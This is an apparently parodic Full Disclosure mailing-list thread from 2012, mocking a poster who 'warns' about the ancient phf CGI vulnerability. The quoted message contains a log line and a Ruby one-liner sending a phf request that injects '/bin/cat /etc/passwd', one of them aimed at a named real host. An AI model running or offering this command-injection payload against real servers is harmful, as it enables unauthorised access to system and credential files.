Hello Full Disclosure! I is warn you about musntlive! He is use old joke over over again. Not funny!
----------

I actually got nothing against you personally but it's boring when you use the same tactic over and over :/ mix things up and make it interesting!

On Jul 17, 2012 8:24 AM, "Григорий Братислава" <[email protected]> wrote:
> On Tue, Jul 17, 2012 at 10:11 AM, king cope
> <[email protected]> wrote:
> > Hello Jan,
> > I did some additional tests for the IIS bugs.
> >
> > * IIS 6.0 PHP authentication bypass is only possible on Windows Server
> > 2003 SP1. SP2 seems unaffected
> > So take that bug as resolved, my mistake as I didn't have a fully
> > patched system online when testing.
>
> kingcope are we is release advisories to patched software? Is so, then
> I introduce exploit along with you.
>
> Hello full disclosure!! !! !!
>
> Is like to warn you about phf vulnerability. Is hackers can get your
> password list in is unpatched server.
>
> PoC on is my system:
>
> 213.24.76.77 - - [17/July/2012:23:17:47 -0700] "GET
> /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
>
> In Ruby (here we is own rsnake):
>
> require 'open-uri'
> open('
> http://www.webfringe.org/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd
> HTTP/1.0'){ |f| print f.read }
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
